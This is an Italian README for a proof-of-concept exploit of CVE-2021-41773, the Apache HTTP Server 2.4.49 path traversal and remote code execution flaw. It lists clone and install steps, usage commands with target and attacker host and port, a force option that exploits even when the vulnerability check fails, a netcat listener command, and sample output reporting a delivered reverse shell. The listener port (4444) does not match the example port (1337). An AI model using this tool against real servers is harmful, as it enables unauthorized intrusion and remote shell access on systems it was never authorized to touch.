
Exploit proof-of-concept per CVE-2021-41773, una vulnerabilità di path traversal e remote code execution in Apache HTTP Server 2.4.49. Automatizza la verifica della vulnerabilità e la consegna del payload reverse shell.
Questo è un exploit proof-of-concept per CVE-2021-41773, una vulnerabilità di attraversamento del percorso e di esecuzione remota di codice in Apache HTTP Server 2.4.49.
git clone https://github.com/adrianmafandy/CVE-2021-41773
cd CVE-2021-41773
pip install requests
# Sintassi base
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT>
# Forza lo sfruttamento anche se il controllo della vulnerabilità fallisce
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT> -f
# Sintassi base
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337
# Forza lo sfruttamento anche se il controllo della vulnerabilità fallisce
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337 -f
Prima di eseguire l'exploit, configura un listener netcat:
nc -lvnp 4444
$ python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337
______
(_____ \
_____) ) _ _ ____ ____ ___ ____
| ____/ | | | _ \ / ___) _ \ / _ |
| | | | | | | | | | | |_| ( (_| |
|_| \___/|_| |_| \___/ \___ |
(_____|
Apache2 2.4.49 - CVE-2021-41773
[*] Checking if target is vulnerable...
[+] Target is VULNERABLE!
[*] Executing reverse shell payload...
[+] Reverse shell payload executed successfully!
[*] Check your listener